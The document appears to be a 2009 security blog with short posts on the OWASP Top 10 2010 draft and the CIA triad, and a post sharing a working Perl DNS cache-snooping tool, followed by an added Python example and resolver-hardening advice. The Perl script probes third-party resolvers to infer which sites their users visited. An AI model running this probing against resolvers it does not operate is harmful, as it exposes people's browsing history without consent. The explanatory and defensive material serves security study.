OWASP Top 10 2010 RC1

Posted by Brett Hardin on 13th November 2009

Reading time: 2 – 4 minutes

Photo: Rionda


While attending OWASP AppSec DC this week, I was able to see the preliminary release of the OWASP Top 10 for 2010. This is the first release candidate, and the 2010 Top 10 is now available for public comment. We will soon see what the security community thinks of it, but OWASP is hoping for a finalized release in the early first quarter of 2010.

For regular readers, there will not be much new in the OWASP Top 10 2010. The main change is the order, or rather the priority, of the vulnerabilities. While the OWASP Top 10 – 2007 list focused on the top 10 vulnerabilities in web applications, the 2010 Top 10 has been reframed to reflect the top 10 application security risks to an organization.

The 2007 list also ranked entries by how frequently the vulnerabilities occurred in web applications. The OWASP Top Ten 2010 list, however, is prioritized by the estimated risk to the organization.

Risks Added to the OWASP 2010 Top 10

The new vulnerabilities are Security Misconfiguration (A6) and Unvalidated Redirects and Forwards (A8). I will address these two risks in future articles.

Vulnerabilities Removed from the OWASP 2010 Top 10

Since two risks were added, OWASP had to drop two vulnerabilities that were already on the list: Malicious File Execution, and Information Leakage and Improper Error Handling.

Malicious File Execution has been removed because it is much less prevalent now than it was in 2007. OWASP also states that PHP now ships with more security enabled by default. This is why it has been removed from the list.

Information Leakage and Improper Error Handling has been removed because disclosing stack traces and error messages to the user typically has a low impact. (Personally, I disagree with this.)

OWASP Top 10 2010 RC1

A1 – Injection
A2 – Cross-Site Scripting (XSS)
A3 – Broken Authentication and Session Management
A4 – Insecure Direct Object References
A5 – Cross Site Request Forgery (CSRF)
A6 – Security Misconfiguration
A7 – Failure to Restrict URL Access
A8 – Unvalidated Redirects and Forwards
A9 – Insecure Cryptographic Storage
A10 – Insecure Communications

We shall see in the next few months what the community thinks of these changes.


Confidentiality, Integrity, and Availability

Posted by Brett Hardin on 4th November 2009

Reading time: 2 – 3 minutes


Photo: jaeming

Being security aware and security conscious often boils down to understanding three key concepts that are common to risk management.

These security concepts have been around since the inception of information security. Although they are high-level generalizations, they are important for everyone to know.

This article focuses on how each of these applies to information systems.

Confidentiality

Confidentiality loss happens when information can be viewed (read) by individuals who shouldn’t access it.

Loss of confidentiality can happen physically or electronically.

Electronic confidentiality loss can happen when clients and servers aren’t encrypting their communications, which allows malicious parties to view private communications.

Physical confidentiality loss can happen through social engineering or through theft, which typically means stolen laptops.

Integrity

Integrity loss happens when information is modified without the modification being authorized. This doesn’t mean that an unauthorized party has to cause the integrity loss; it can also result from an authorized party doing something they shouldn’t. An example would be a system administrator deleting an account record they weren’t authorized to delete.

Integrity loss can happen either accidentally or through malicious intent. Malicious integrity loss happens when a user purposely adds, deletes, or modifies database records. This can be done by an authorized party (someone who has the access to modify the record) or by an unauthorized party who has access they shouldn’t have.

Accidental integrity loss happens when a system modifies or deletes records that it shouldn’t. This can happen when a virus infects a system or when a user does something he didn’t intend to do. This is why systems often ask you to confirm that you want a file deleted before actually deleting it.

Availability

Availability is the simple idea that when a user or system attempts to access something, it is available to be accessed. This is extremely important for mission-critical systems. Availability for these systems is so critical that most companies have business continuity plans (BCPs) so that their systems have redundancy.

Just like confidentiality and integrity loss, availability loss can happen by accident (a car crashing into a fiber pole and cutting access to a system) or through malicious intent, such as a Denial-of-Service attack.


Cache_Snoop.pl

Posted by Brett Hardin on 28th October 2009

Reading time: 4 – 6 minutes

Photo: Tim Caynes


In the book, Hacking: The Next Generation, I cover a topic referred to as DNS cache snooping. Cache snooping is not a new attack and has been around for quite a while [PDF]. However, I couldn’t find a good piece of code that would interrogate DNS servers, so I created code to do it.

I put it in Appendix B in the book, but figured it would be nice to have some place to copy & paste it.

Let me know if you have any questions or comments. Have Fun!

Cache_Snoop.pl

#!/usr/bin/perl
# cache_snoop.pl
# Developed by: Brett Hardin
use Getopt::Long;

$version = "1.0";

my $options = GetOptions(
    "help"      => \$help,
    "save"      => \$save,
    "dns=s"     => \$dns_server,
    "ttl"       => \$ttl_option,
    "queries=s" => \$queries
);

if ($help ne "")       { &Help; }
if ($dns_server eq "") { die "Usage: cache_snoop.pl -dns <server> -queries <file>\n"; }
$queries = "queries.txt" if ($queries eq "");    # default named in Help
open(FILE, $queries) or die "Usage: cache_snoop.pl -dns <server> -queries <file>\n";
@sites = <FILE>;    # one hostname per line; lines starting with '#' are echoed as comments
close(FILE);

# FIRST RUN IS FOR FINDING OUT DEFAULT TTL
if ($ttl_option ne "") {
    print "Finding Default TTL's...\n";
    &default_TTL;
}

for $site (@sites) {
    chomp($site);
    $default_TTL = $TTL_list{$site};

    if ($site =~ /^\#/) { print $site . "\n"; next; }
    if ($site =~ /^$/)  { print "\n"; next; }

    # Non-recursive query: the server may only answer from what is already in its cache
    $results = `dig \@$dns_server $site A +norecurse`;

    if ($results =~ /ANSWER: 0,/) {
        print "[NO] " . $site . " not visited\n";
    }
    else {
        @edited_result = split(/\n/, $results);
        @greped_result = grep(/^$site\./, @edited_result);
        @A_Broke       = split(/\s+/, $greped_result[0]);
        $TTL           = $A_Broke[1];    # TTL remaining in the server's cache

        print "[YES] " . $site . " ($TTL";
        if ($ttl_option ne "") {
            &timeLeft;
            print "/$default_TTL) - Initial Request was made: $LAST_VISITED\n";
        }
        else { print " TTL)\n"; }

        if ($save ne "") {
            open(OUTPUT, ">$site.DNS.txt");
            print OUTPUT $results;
            close(OUTPUT);
        }
    }
}

sub timeLeft {
    # Elapsed time since the record entered the cache = default TTL - remaining TTL
    $seconds      = ($default_TTL - $TTL);
    @parts        = gmtime($seconds);    # (sec, min, hour, mday, mon, year, wday, yday)
    $LAST_VISITED = "$parts[7]d $parts[2]h $parts[1]m $parts[0]s";
}

sub default_TTL {
    # This function returns the default TTL
    # To do this, you need to find the DNS server from the root DNS server
    # then query that DNS server for the site you are looking for, it will return the default TTL
    %DNS_list = ();
    %TTL_list = ();

    # Find the NS for the site
    for $site (@sites) {
        if ($site =~ /^\#/) { next; }
        if ($site =~ /^$/)  { next; }

        chomp($site);

        # QUERY the TLD domain
        $query_result_1 = `dig \@a.gtld-servers.net $site`;
        @edited_query_1 = split(/\n/, $query_result_1);
        $found          = 0;

        # Find the DNS server (first record in the ADDITIONAL SECTION)
        for $each (@edited_query_1) {
            if ($found == 1) {
                @A_Broke  = split(/\s+/, $each);
                $root_DNS = $A_Broke[0];
                last;
            }
            if ($each =~ /ADDITIONAL SECTION:/) { $found = 1; }
        }
        $DNS_list{$site} = $root_DNS;
    }
    print "Done with Name Server lookup...\n";

    # Find the TTL from the default NS server.
    foreach $site (sort keys %DNS_list) {
        #print "$site: $DNS_list{$site}\n";
        $DNS_SERVER = $DNS_list{$site};

        # QUERY the authoritative name server
        $query_result_2 = `dig \@$DNS_SERVER $site`;

        @edited_query_2 = split(/\n/, $query_result_2);
        $found          = 0;

        # Find the TTL (second field of the first ANSWER SECTION record)
        for $each (@edited_query_2) {
            if ($found == 1) {
                @A_Broke     = split(/\s+/, $each);
                $default_TTL = $A_Broke[1];
                last;
            }
            if ($each =~ /ANSWER SECTION:/) { $found = 1; }
        }
        #print $site . " default TTL: $default_TTL\n";
        $TTL_list{$site} = $default_TTL;
    }
    print "Done with TTL lookups...\n";

    foreach $site (sort keys %TTL_list) {
        print "$site - $TTL_list{$site}\n";
    }
}

sub Help {
    print "\n";
    print "#################################\n";
    print "#                               #\n";
    print "#      cache_snoop.pl v$version      #\n";
    print "#                               #\n";
    print "#################################\n\n";
    print "usage: $0 -dns <server> -queries <file>\n";
    print "\n";
    print "purpose: Exploit a DNS server that allows 3rd party queries to determine what sites\n";
    print "         the DNS servers users have been going to.\n";
    print "\n";
    print "  Options:\n\n";
    print "    -help     What you're looking at.\n";
    print "    -dns      [required] DNS server susceptible to 3rd party queries\n";
    print "    -queries  file with the queries you would like to make [Default: queries.txt]\n";
    print "    -save     Save the DNS responses that are received to individual text files.\n";
    print "    -ttl      Will lookup the default TTL's and compare them with what the server has.\n";
    print "\n";
    print "Sample Output:\n";
    print "[NO] fidelity.com not visited\n";
    print "[YES] finance.google.com (165020) visited\n";
    print "[Visited] site (TTL)\n";
    print "\n\n";
    exit;
}
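The script above shells out to dig and scrapes its text output, and the interesting logic is in how that output is read: "ANSWER: 0" on a non-recursive query means the name is not in the resolver's cache, and the difference between the authoritative (default) TTL and the TTL the cache still holds tells you how long ago the resolver first looked the name up. The following Python is an added example, not code from the post or the book; it implements that same parsing and TTL arithmetic over constructed dig output so it runs offline, and it adds the one case a resolver operator most wants to see from the outside: a REFUSED status, which is what a resolver that does not serve cache contents to third parties returns. The sample outputs, hostnames, addresses and the default TTL of 172800 are all constructed.

```python
"""Classify a non-recursive DNS probe from dig(1) output (added example)."""
import re

# Constructed sample dig outputs; not captured from any real resolver.
NOT_CACHED = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4001
;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;fidelity.com.\t\t\tIN\tA
"""

CACHED = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4002
;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;finance.google.com.\t\tIN\tA

;; ANSWER SECTION:
finance.google.com.\t165020\tIN\tA\t192.0.2.10
"""

# A resolver that restricts cache access to its own clients answers outsiders like this.
REFUSED = """\
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4003
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
"""


def parse_dig(output):
    """Return (status, answer_count, records) where each record is
    (owner name, ttl, rr type, rdata) taken from the ANSWER SECTION."""
    status = re.search(r"status: (\w+)", output)
    count = re.search(r"ANSWER: (\d+)", output)
    records = []
    in_answer = False
    for line in output.splitlines():
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if in_answer:
            if not line.strip():        # blank line ends the section
                break
            fields = line.split()       # name TTL class type rdata
            if len(fields) >= 5 and fields[1].isdigit():
                records.append((fields[0], int(fields[1]), fields[3], fields[4]))
    return (status.group(1) if status else "UNKNOWN",
            int(count.group(1)) if count else 0,
            records)


def elapsed_since_cached(ttl, default_ttl):
    """Seconds since the record entered the cache: the TTL counts down from
    the authoritative value, so default minus remaining is the age."""
    return max(default_ttl - ttl, 0)


def fmt_duration(seconds):
    """Same d/h/m/s layout as the script's timeLeft, via divmod instead of gmtime."""
    days, rem = divmod(seconds, 86400)
    hours, rem = divmod(rem, 3600)
    minutes, secs = divmod(rem, 60)
    return f"{days}d {hours}h {minutes}m {secs}s"


def classify(output, site, default_ttl=None):
    """Verdict for one +norecurse probe: 'refused', 'not cached' or 'cached'.
    When the authoritative default TTL is known, the age of the cache entry is added."""
    status, count, records = parse_dig(output)
    if status != "NOERROR":
        return {"verdict": "refused", "status": status}
    if count == 0:
        return {"verdict": "not cached", "status": status}
    mine = [r for r in records if r[0] == site + "." and r[2] == "A"]
    if not mine:
        return {"verdict": "not cached", "status": status}
    ttl = mine[0][1]
    result = {"verdict": "cached", "status": status, "ttl": ttl}
    if default_ttl is not None:
        age = elapsed_since_cached(ttl, default_ttl)
        result["age_seconds"] = age
        result["age"] = fmt_duration(age)
    return result


if __name__ == "__main__":
    print(classify(NOT_CACHED, "fidelity.com"))
    print(classify(CACHED, "finance.google.com", default_ttl=172800))
    print(classify(REFUSED, "finance.google.com"))
```

The age estimate is only as good as the default TTL it is compared against, which is why the script's -ttl option fetches it from the authoritative server first. If you operate a resolver, the verdict you want from a probe sent from outside your network is "refused": in BIND 9 that is the effect of limiting allow-recursion and allow-query-cache to your own address ranges, so a non-recursive query from elsewhere never reveals what the cache holds.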
